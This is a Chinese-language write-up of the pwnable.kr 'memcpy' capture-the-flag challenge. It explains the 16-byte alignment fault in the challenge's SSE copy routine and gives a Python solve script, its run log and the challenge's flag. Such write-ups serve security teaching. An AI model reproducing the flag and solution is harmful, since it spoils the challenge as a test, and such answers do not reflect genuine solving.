老样子连上去看看,发现一个.c和一个readme
先看readme,大概说了教我们连接到哪去找这个.c可执行文件和flag
看一下memcpy.c
// compiled with : gcc -o memcpy memcpy.c -m32 -lm
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/mman.h>
#include <math.h>unsigned long long rdtsc(){asm("rdtsc");
}char* slow_memcpy(char* dest, const char* src, size_t len){int i;for (i=0; i<len; i++) {dest[i] = src[i];}return dest;
}char* fast_memcpy(char* dest, const char* src, size_t len){size_t i;// 64-byte block fast copyif(len >= 64){i = len / 64;len &= (64-1);while(i-- > 0){__asm__ __volatile__ ("movdqa (%0), %%xmm0\n""movdqa 16(%0), %%xmm1\n""movdqa 32(%0), %%xmm2\n""movdqa 48(%0), %%xmm3\n""movntps %%xmm0, (%1)\n""movntps %%xmm1, 16(%1)\n""movntps %%xmm2, 32(%1)\n""movntps %%xmm3, 48(%1)\n"::"r"(src),"r"(dest):"memory");dest += 64;src += 64;}}// byte-to-byte slow copyif(len) slow_memcpy(dest, src, len);return dest;
}int main(void){setvbuf(stdout, 0, _IONBF, 0);setvbuf(stdin, 0, _IOLBF, 0);printf("Hey, I have a boring assignment for CS class.. :(\n");printf("The assignment is simple.\n");printf("-----------------------------------------------------\n");printf("- What is the best implementation of memcpy? -\n");printf("- 1. implement your own slow/fast version of memcpy -\n");printf("- 2. compare them with various size of data -\n");printf("- 3. conclude your experiment and submit report -\n");printf("-----------------------------------------------------\n");printf("This time, just help me out with my experiment and get flag\n");printf("No fancy hacking, I promise :D\n");unsigned long long t1, t2;int e;char* src;char* dest;unsigned int low, high;unsigned int size;// allocate memorychar* cache1 = mmap(0, 0x4000, 7, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);char* cache2 = mmap(0, 0x4000, 7, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);src = mmap(0, 0x2000, 7, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);size_t sizes[10];int i=0;// setup experiment parametersfor(e=4; e<14; e++){ // 2^13 = 8Klow = pow(2,e-1);high = pow(2,e);printf("specify the memcpy amount between %d ~ %d : ", low, high);scanf("%d", &size);if( size < low || size > high ){printf("don't mess with the experiment.\n");exit(0);}sizes[i++] = size;}sleep(1);printf("ok, lets run the experiment with your configuration\n");sleep(1);// run experimentfor(i=0; i<10; i++){size = sizes[i];printf("experiment %d : memcpy with buffer size %d\n", i+1, size);dest = malloc( size );memcpy(cache1, cache2, 0x4000); // to eliminate cache effectt1 = rdtsc();slow_memcpy(dest, src, size); // byte-to-byte memcpyt2 = rdtsc();printf("ellapsed CPU cycles for slow_memcpy : %llu\n", t2-t1);memcpy(cache1, cache2, 0x4000); // to eliminate cache effectt1 = rdtsc();fast_memcpy(dest, src, size); // block-to-block memcpyt2 = rdtsc();printf("ellapsed CPU cycles for fast_memcpy : %llu\n", t2-t1);printf("\n");}printf("thanks for helping my experiment!\n");printf("flag : ----- erased in 
this source code -----\n");return 0;
}
分析一下这段代码做了什么
size_t sizes[10];int i=0;// setup experiment parametersfor(e=4; e<14; e++){ // 2^13 = 8Klow = pow(2,e-1);high = pow(2,e);printf("specify the memcpy amount between %d ~ %d : ", low, high);scanf("%d", &size);if( size < low || size > high ){printf("don't mess with the experiment.\n");exit(0);}sizes[i++] = size;}
从上面的代码中分析得到,程序会循环10次(e从4到13),每次需要输入一个介于2的e-1次幂和2的e次幂之间的数(即8~16、16~32……4096~8192),否则程序直接退出
// run experimentfor(i=0; i<10; i++){size = sizes[i];printf("experiment %d : memcpy with buffer size %d\n", i+1, size);dest = malloc( size );
这段代码分析得到,输入size后malloc分配空间,分配的空间大小就是我们输入的size大小。
memcpy(cache1, cache2, 0x4000); // to eliminate cache effectt1 = rdtsc();slow_memcpy(dest, src, size); // byte-to-byte memcpyt2 = rdtsc();printf("ellapsed CPU cycles for slow_memcpy : %llu\n", t2-t1);memcpy(cache1, cache2, 0x4000); // to eliminate cache effectt1 = rdtsc();fast_memcpy(dest, src, size); // block-to-block memcpyt2 = rdtsc();printf("ellapsed CPU cycles for fast_memcpy : %llu\n", t2-t1);printf("\n");
分配空间后,分别用slow_memcpy和fast_memcpy两种方式,把src(mmap出来的内存)中的数据拷贝到刚分配的堆块dest中,并分别输出二者耗费的CPU周期数。那么分析一下slow_memcpy和fast_memcpy:
/*
 * Naive copy: moves len bytes from src to dest one byte at a time.
 * Returns dest.
 */
char* slow_memcpy(char* dest, const char* src, size_t len){
    int idx = 0;
    while (idx < len) {
        dest[idx] = src[idx];
        idx++;
    }
    return dest;
}
slow_memcpy是循环赋值
char* slow_memcpy(char* dest, const char* src, size_t len);    // byte-wise copy used for the tail

/*
 * Copy len bytes from src to dest, 64 bytes at a time through xmm0-xmm3
 * (movdqa loads, movntps stores); the remaining len % 64 bytes are copied
 * by slow_memcpy.
 *
 * Both instructions require their memory operand to be 16-byte aligned,
 * so src and dest must be 16-byte aligned whenever len >= 64.
 *
 * Returns dest advanced past the part copied in 64-byte blocks (not the
 * original dest when len >= 64).
 */
char* fast_memcpy(char* dest, const char* src, size_t len){
    size_t i;
    // 64-byte block fast copy
    if(len >= 64){
        i = len / 64;
        len &= (64-1);
        while(i-- > 0){
            __asm__ __volatile__ (
            "movdqa (%0), %%xmm0\n"
            "movdqa 16(%0), %%xmm1\n"
            "movdqa 32(%0), %%xmm2\n"
            "movdqa 48(%0), %%xmm3\n"
            "movntps %%xmm0, (%1)\n"
            "movntps %%xmm1, 16(%1)\n"
            "movntps %%xmm2, 32(%1)\n"
            "movntps %%xmm3, 48(%1)\n"
            ::"r"(src),"r"(dest):"memory");
            dest += 64;
            src += 64;
        }
    }

    // byte-to-byte slow copy
    if(len) slow_memcpy(dest, src, len);
    return dest;
}
fast_memcpy在长度不小于64字节时,用内联汇编指令movdqa和movntps以64字节为一块进行拷贝,剩余不足64字节的部分再交给slow_memcpy逐字节拷贝
拷贝结束后输出flag
编译运行一下
其实我这里编译完成后乱输入并没有报错,可能gcc编译器帮我做了一些优化
我还连接上readme提示的接口,对程序乱输入尝试了一下,进程没执行完,但是没有获得到错误信息
查看了一下系统信息好像也是64位的
我看别人的writeup中写都是会产生如下的错误:
具体原因我还不明,知道的大佬可以在下面指导我一下,感激不尽,而且我看 反汇编在编译中也是和别人一样的,如下:
上面是出错的位置。fast_memcpy中用于内存复制的两个指令movdqa和movntps,它们的操作数如果是内存地址的话,那么这个地址必须是16字节对齐的,否则会产生一般保护性异常导致程序退出。
而且在看别人的writeup中提到了这一点:
malloc在分配内存时它实际上还会多分配4字节用于存储堆块信息,所以如果分配a字节实际上分配的是a+4字节。另外32位系统上该函数分配的内存是以8字节对齐的
看到这里突然想到上面瞎输入不报错的原因有可能是我在64位的kali下执行的,但目前没有验证,但是看上面查询的操作系统别人也是64位的,有些矛盾,但可能有特殊设置,目前还不得知,等下次下一个32位的kali再来验证补充(我个人猜测目前可能是针对32位环境有这种错误,64我这里验证是没有的)
既然知道了这两点就知道程序的异常退出是因为分配的内存没有16字节对齐,那么要getflag,只需要每次分配的内存地址能够被16整除就可以了。实际上只要让每个堆块的实际大小都是16的倍数即可:按上面的规则,堆块实际大小是(请求大小+4)再向上取整到8的倍数,因此请求大小除以16的余数在9~12之间就可以了,下面exp中用的2^i-4余数正好是12。
下面是exp
from socket import *
import time


def work():
    """Connect to the pwnable.kr memcpy service and answer its ten size prompts.

    For every prompt the script sends 2**i - 4 (i = 4..13), then prints
    everything the server sends back until the connection is closed.
    """
    host = 'pwnable.kr'
    port = 9022
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect((host, port))
    try:
        # banner
        print(sock.recv(100).decode())
        for i in range(4, 14):
            tmp = 2**i - 4
            # show the prompt together with the value we are about to send
            print('%s %d' % (sock.recv(1024).decode(), tmp))
            time.sleep(1)
            sock.sendall((str(tmp) + '\n').encode())
        # drain the experiment output (including the flag) until EOF
        while True:
            r = sock.recv(1024)
            if r:
                print(r.decode())
                time.sleep(0.5)
            else:
                break
    finally:
        sock.close()


if __name__ == '__main__':
    work()
保存运行
C:\Users\xxx\Desktop>python exp.py
Hey, I have a boring assignment for CS class.. :(
The assignment is simple.
-----------------------------------------------------
- What is the best implementation of memcpy? -
- 1. implement your own slow/fast version of memcpy -
- 2. compare them with various size of data -
- 3. conclude your experiment and submit report -
-----------------------------------------------------
This time, just help me out with my experiment and get flag
No fancy hacking, I promise :D
specify the memcpy amount between 8 ~ 16 : 12
specify the memcpy amount between 16 ~ 32 : 28
specify the memcpy amount between 32 ~ 64 : 60
specify the memcpy amount between 64 ~ 128 : 124
specify the memcpy amount between 128 ~ 256 : 252
specify the memcpy amount between 256 ~ 512 : 508
specify the memcpy amount between 512 ~ 1024 : 1020
specify the memcpy amount between 1024 ~ 2048 : 2044
specify the memcpy amount between 2048 ~ 4096 : 4092
specify the memcpy amount between 4096 ~ 8192 : 8188
ok, lets run the experiment with your configuration
experiment 1 : memcpy with buffer size 12
ellapsed CPU cycles for slow_memcpy : 2040
ellapsed CPU cycles for fast_memcpy : 254

experiment 2 : memcpy with buffer size 28
ellapsed CPU cycles for slow_memcpy : 444
ellapsed CPU cycles for fast_memcpy : 292

experiment 3 : memcpy with buffer size 60
ellapsed CPU cycles for slow_memcpy : 592
ellapsed CPU cycles for fast_memcpy : 478

experiment 4 : memcpy with buffer size 124
ellapsed CPU cycles for slow_memcpy : 962
ellapsed CPU cycles for fast_memcpy : 558

experiment 5 : memcpy with buffer size 252
ellapsed CPU cycles for slow_memcpy : 1818
ellapsed CPU cycles for fast_memcpy : 564

experiment 6 : memcpy with buffer size 508
ellapsed CPU cycles for slow_memcpy : 3496
ellapsed CPU cycles for fast_memcpy : 574

experiment 7 : memcpy with buffer size 1020
ellapsed CPU cycles for slow_memcpy : 6840
ellapsed CPU cycles for fast_memcpy : 724

experiment 8 : memcpy with buffer size 2044
ellapsed CPU cycles for slow_memcpy : 13790
ellapsed CPU cycles for fast_memcpy : 1040

experiment 9 : memcpy with buffer size 4092
ellapsed CPU cycles for slow_memcpy : 28216
ellapsed CPU cycles for fast_memcpy : 1874

experiment 10 : memcpy with buffer size 8188
ellapsed CPU cycles for slow_memcpy : 61294
ellapsed CPU cycles for fast_memcpy : 2874

thanks for helping my experiment!
flag : 1_w4nn4_br34K_th3_m3m0ry_4lignm3nt
获得flag :)